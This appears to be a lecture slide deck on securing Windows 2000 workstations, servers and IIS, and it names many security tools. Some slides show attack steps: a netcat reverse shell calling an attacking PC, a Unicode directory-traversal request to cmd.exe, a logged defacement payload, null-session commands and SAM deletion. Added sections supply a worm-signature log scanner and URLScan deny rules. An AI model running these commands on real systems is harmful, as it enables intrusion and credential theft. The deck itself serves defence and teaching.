Win Security


Windows 2000 Security

Matthew Cook
Loughborough University
http://www.escarpment.net/

1
Introduction

Loughborough University
http://www.lboro.ac.uk/computing/

Janet Web Cache Service


http://wwwcache.ja.net

2
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security advice
✦ Need for other OS security advice
✦ Installation of Internet Facing Windows 2000 systems.

3
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security

✦ Server Security

✦ IIS Security

✦ Security Tools

✦ Questions and Answers

4
Physical Security

"The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete bunker, and is surrounded by … very highly paid armed guards. Even then, I wouldn't stake my life on it."
Gene Spafford

5
Security Threats
✦ Denial of Service
✦ Theft of information

✦ Modification

✦ Fabrication (Spoofing or Masquerading)

6
Security Holes
✦ Physical Security Holes
✦ Software Security Holes

✦ Incompatible Usage Security Holes

✦ Social Engineering

✦ Complacency

7
Workstation Security

Security for General Workstations

8
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’ service packs and hot fixes.
✦ Check the model periodically

✦ Hfnetchk Tool

10
NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application

✦ Use xcacls from the Resource Kit

✦ Script NTFS security

✦ Set using Security Templates

✦ Example

11
Policies and Profiles
✦ NT Policy files are different to GPO (Group Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration

12
Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates

✦ Quick and Easy to apply

✦ Templates are cumulative

✦ Demonstration

13
Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible

✦ Basicdc/sv/wk – Basic Security

✦ Securedc/wk – More Secure

✦ Hisecdc/ws – Further Security

✦ Ocfiless/w – Optional Components

14
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure the Audit Policy has been configured
✦ Check the Event Viewer regularly

✦ Or Use NTLast (Foundstone)

✦ URL: http://www.foundstone.com/

✦ Or ELM (TNT Software)

✦ URL: http://www.tntsoftware.com/

15
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg

✦ EFS

✦ DOS Boot disc

✦ Linux Boot disc

✦ BIOS Passwords

16
PipeUpAdmin & PipeUpSAM
✦ Uses vulnerability in Named Pipes in the Service Control Manager (SCM)
✦ Adds user to Administrator Group

✦ Patch Bulletin: MS00-053

✦ URL: http://www.dogmile.com/files/

17
Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context

✦ Patch Bulletin: MS01-007

✦ NOT included in Windows 2000 SP2

18
EFS
✦ Changing the password of the recovery agent (Administrator)
✦ Changing the password of the user

✦ EFS temporary files

19
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/

20
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY

✦ Limited SCSI support

✦ URL: http://home.eunet.no/~pnordahl/

21
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities

✦ Check for Default Passwords

✦ Upgrade BIOS

✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/

22
Server Security

Security for Internet Facing Servers

23
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services

✦ Hfnetchk and Qchain

✦ SNMP Vulnerabilities

✦ Active Directory Vulnerabilities

✦ IPSec

24
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]

✦ SMB over TCP [Port 445]

✦ Port 445 Windows 2000 only

✦ Block TCP/UDP 135-139 and 445 at the firewall

25
NetBIOS/SMB Services…

Null Authentication:
Net use \\camford\IPC$ "" /u:""
✦ Famous tools like ‘Red Button’
Net view \\camford
✦ Investigate srvcheck and srvinfo in the Resource Kit

26
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com

✦ Enum from Razor

✦ URL: http://razor.bindview.com/

✦ A Google search reveals many, many more

27
NetBIOS/SMB Services…

To disable NetBIOS
2. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window

28
NetBIOS/SMB Services…

Disable Null Authentication

✦ Key similar to Windows NT 4.0
✦ HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
✦ REG_DWORD set to 0, 1 or 2!
✦ HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
✦ REG_DWORD set to 0 or 1
29
Hfnetchk
✦ Use Hfnetchk to check hot fixes
✦ Checks machines against Microsoft XML

✦ Automate the process using batch files and a mail client (Postie)
✦ URL: http://www.infradig.com/infradig/postie/
✦ Use QChain to chain hot fixes together without rebooting in-between.

30
Hfnetchk…

Patch details for:


✦ Windows NT 4.0 and Windows 2000

✦ IIS 4 and IIS 5

✦ SQL Server 7.0

✦ SQL Server 2000

✦ Internet Explorer 5.01 (and later)

31
Hfnetchk…
✦ Default scan of local host (pre-downloaded XML)
hfnetchk -x mssecure.xml
✦ Default scan of lboro domain
hfnetchk -d lboro
✦ Verbose scan of local host
hfnetchk -v -x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk -v -a b -x mssecure.xml

32
Hfnetchk…
✦ Test problems
hfnetchk -z -v -x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk -x http://camford.ac.uk/mssecure.xml
hfnetchk -x s:\camford\mssecure.xml

33
QChain

Supported by:
✦ Windows NT 4.0

✦ Windows 2000

✦ Windows XP (25th October 2001)

34
QChain…
✦ Run the hot fix with -z (No reboot) and -m (Quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=29821

35
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services

✦ Set community names

✦ Set accepted hosts

36
SNMP Vulnerabilities…

37
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit

✦ Authenticated connection needed

✦ Filter TCP 389 (LDAP) and 3268 (GC)

✦ DNS – Securing Zone Transfers to Slave Name servers only

38
IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN

✦ Mainly for wireless use

✦ WEP encryption cracked

✦ URL: http://www.freeswan.org/

✦ URL: http://airsnort.sourceforge.net/

39
IIS Security

Internet Information Server

40
IIS Security
✦ History
✦ Recent Worms

✦ IIS Lock Down Tool

✦ URL Scan

✦ The Future

41
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0

✦ Quickly gained reputation for (in)security

✦ IIS 5.0 Installed by Windows 2000

✦ Microsoft releases Hfnetchk

✦ Closely followed by IIS Lockdown and URLScan
42
Recent Worms
✦ Sadmind/IIS
Directory Traversal (Unicode Exploit)
✦ CodeRed
ida/idq buffer overflow
✦ CodeGreen
ida/idq buffer overflow
✦ Nimda
Directory Traversal (Unicode Exploit)
43
Sadmind/IIS
✦ 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -
44
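The log entry above is what a Unicode-traversal defacement leaves in an IIS W3C log. As an added example (not part of the original slides), the Python below decodes request paths the way unpatched IIS 4/5 did, accepting overlong UTF-8 such as %c0%af, and flags log lines that match the traversal, cmd.exe/root.exe and .ida/.idq patterns named on the "Recent Worms" slide. The field order and the sample log lines are constructed assumptions.

```python
"""Added example: flag IIS W3C log lines for the worm signatures on the slides
(Unicode traversal, cmd.exe/root.exe access, .ida/.idq probes). Sample data is constructed."""
import posixpath
from urllib.parse import unquote_to_bytes

WORM_BINARIES = {"cmd.exe", "root.exe"}
OVERFLOW_EXTS = {".ida", ".idq"}

def decode_uri(stem):
    """Percent-decode like unpatched IIS: overlong two-byte UTF-8 such as %c0%af ('/')
    or %c1%9c ('\\') is accepted, which is why '..%c0%af..' escapes the web root."""
    raw = unquote_to_bytes(stem)
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # overlong -> ASCII
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out).replace("\\", "/")  # IIS treats backslash as a separator too

def classify(line):
    """Return the signatures one log line matches (empty list if clean). Assumed field
    order, as on the slide: date time c-ip user s-ip s-port method uri-stem uri-query status ua."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 9:
        return []  # W3C header line or truncated record
    stem = decode_uri(fields[7])
    name = posixpath.basename(stem).lower()
    hits = []
    if ".." in stem.split("/"):
        hits.append("directory-traversal")
    if name in WORM_BINARIES:
        hits.append("shell-access")
    if posixpath.splitext(name)[1] in OVERFLOW_EXTS:
        hits.append("ida-idq-probe")
    return hits

def scan(lines):
    """Map line index -> matched signatures for every suspicious line."""
    return {i: h for i, line in enumerate(lines) if (h := classify(line))}

SAMPLE_LOG = [  # constructed lines; the slide's x.x octets replaced with made-up ones
    "2001-05-03 22:30:01 203.67.0.1 - 158.125.0.1 80 GET /index.htm - 200 -",
    "2001-05-03 22:34:49 203.67.0.1 - 158.125.0.1 80 GET /scripts/root.exe /c+dir 200 -",
    "2001-05-03 22:35:10 203.67.0.2 - 158.125.0.1 80 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir 200 -",
    "2001-07-19 10:00:00 203.67.0.3 - 158.125.0.1 80 GET /default.ida XXXXXXXX%u9090 200 -",
]
```

Double-encoded variants (e.g. %255c) are decoded only once here; run decode_uri twice if you want to catch those as well.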
System Attacks
✦ Monday Morning Phone Call
✦ Perl Script ‘unicodeloader’

✦ http://camford/scripts/upload.asp

✦ http://camford/scripts/cmdasp.asp

✦ Sadmind/IIS worm and unicodeloader kit

✦ GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
✦ URL: http://www.sensepost.com/
45
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc -l -p 1234
✦ Camford:
nc.exe -v -e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/

46
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex
servers
✦ Undo facility to reverse last ‘lock down’
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
48
IIS Lock Down Tool…

Disable:
✦ Active Server Pages
✦ Index Server Interface
✦ Server Side Includes
✦ Internet Data Connector
✦ Internet Printing
✦ HTR Scripting

Remove:
✦ Sample Web Files
✦ Script Virtual Directory
✦ MSADC Directory
✦ WebDAV

Set Permissions on:
✦ Exe files
✦ Content Directories

49
URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571
50
URL Scan…

Filter on:
✦ The request method (verb)

✦ File Extension

✦ URL Encoding

✦ Non ASCII characters

✦ Malicious character sequence

✦ Headers in HTTP GET

51
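As an added example of the six filters listed above (not the urlscan.ini that ships with the tool), a urlscan.ini for an IIS 5 server that serves only static pages. The section and option names are URLScan's own; the particular allow/deny choices are assumptions for a site serving .htm/.html files and images, and comments sit on their own lines because URLScan reads a comment only where the line starts with a semicolon.

```ini
; urlscan.ini for a static-content IIS 5 site (added example, not the shipped default)
[Options]
; Whitelist verbs and extensions instead of blacklisting them
UseAllowVerbs=1
UseAllowExtensions=1
; Decode %xx and Unicode first, then reject anything that decodes a second time
NormalizeUrlBeforeScan=1
VerifyNormalization=1
; Non-ASCII bytes and dots inside directory names are both traversal tricks
AllowHighBitCharacters=0
AllowDotInPath=0
; Drop the Server: banner and log every rejected request (urlscan.log next to urlscan.dll)
RemoveServerHeader=1
EnableLogging=1
PerProcessLogging=0
AllowLateScanning=0

[AllowVerbs]
GET
HEAD

[DenyHeaders]
; WebDAV and Translate: handling is not needed on a static site
Translate:
If:
Lock-Token:

[AllowExtensions]
; assumed content types for this site; '.' permits extensionless (directory) requests
.htm
.html
.css
.gif
.jpg
.png
.

[DenyUrlSequences]
; traversal, trailing-dot and backslash tricks, alternate data streams, leftover encoding
..
./
\
:
%
&
```

Restart the IIS service after editing the file, as the slide notes; rejected requests are answered with a 404 and written to urlscan.log.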
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6

✦ Lock Down Tool (Interim Measures)

✦ Httpd functionality in the kernel (TechEd)

✦ IIS Lockdown included in SP3

✦ Further implications for .NET

52
Security Tools

A look at the freeware and ‘pay for’ tools available.

53
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger

✦ Originally developed for the Unix platforms

✦ Open Source

✦ Port to Win32 available (Release 1.8.1)

✦ Installation on Win32 in under 30 minutes

✦ Run on your IIS server or standalone

55
Snort…

Snort can detect:


✦ Stealth Port Scans
✦ CGI Attacks
✦ Front Page Extensions Attacks
✦ ICMP Activity
✦ SMTP Activity
✦ SQL Activity
✦ SMB Probes
56
Snort…
✦ Default logging to snort\logs\alert.ids
✦ Log to mySQL and SQL Server
✦ Notification as logs, ‘winpopup’, email etc
✦ SnortSnarf or ACID (PHP Based)
✦ GUI – IDS Center
✦ URL: http://snort.sourcefire.com/
✦ URL: http://www.cert.org/kb/acid/
✦ URL: http://www.silicondefense.com/
57
Snort…

58
CIS and Typhon
✦ Typhon, formerly Cerberus Internet Scanner
✦ Written by David Litchfield

✦ URL: http://www.nextgenss.com/

✦ Demonstration

59
CIS and Typhon
✦ Web Checks
✦ FTP Checks
✦ SMTP Checks
✦ POP3 Checks
✦ NT Checks
✦ NetBIOS Checks
✦ MS SQL Checks
✦ SNMP Checks
✦ RPC Checks
✦ Portscan (TCP/UDP)
✦ Finger Checks
✦ DNS Checks
✦ Commercial Version

60
Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2

✦ URL: http://www.ebiz-tech.com/html/pwdump.html

61
Pwdump…
✦ Needs Administrative Privileges
✦ Extracts hashes even if syskey is installed

✦ Extract from remote machines

✦ Identifies accounts with no password

✦ Self contained utility

62
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application

✦ Requires psapi.dll (Windows NT 4.0)

✦ URL: http://www.foundstone.com/

✦ Demonstration

63
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources

✦ Registration $249

✦ URL: http://www.atstake.com/research/lc3/

✦ Demonstration

64
L0pht Crack…

Crack Passwords from:


✦ Local Machine

✦ Remote Machine

✦ SAM File

✦ SMB Sniffer

✦ PWDump file

65
Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting

✦ Open Source

✦ Runs under Unix based OS

✦ Port development for Win32

✦ URL: http://www.insecure.org/nmap/

66
Nmap…

67
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive

✦ Frequently updated modules

✦ Testing of DoS attacks

✦ Open Source

✦ Win32 and Java Client

✦ URL: http://nessus.org/

68
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32

✦ Excellent tool to evaluate Netware security

✦ Open Source

✦ Lots of additional information

✦ URL: http://www.nmrc.org/pandora/

69
Questions and Answers

70
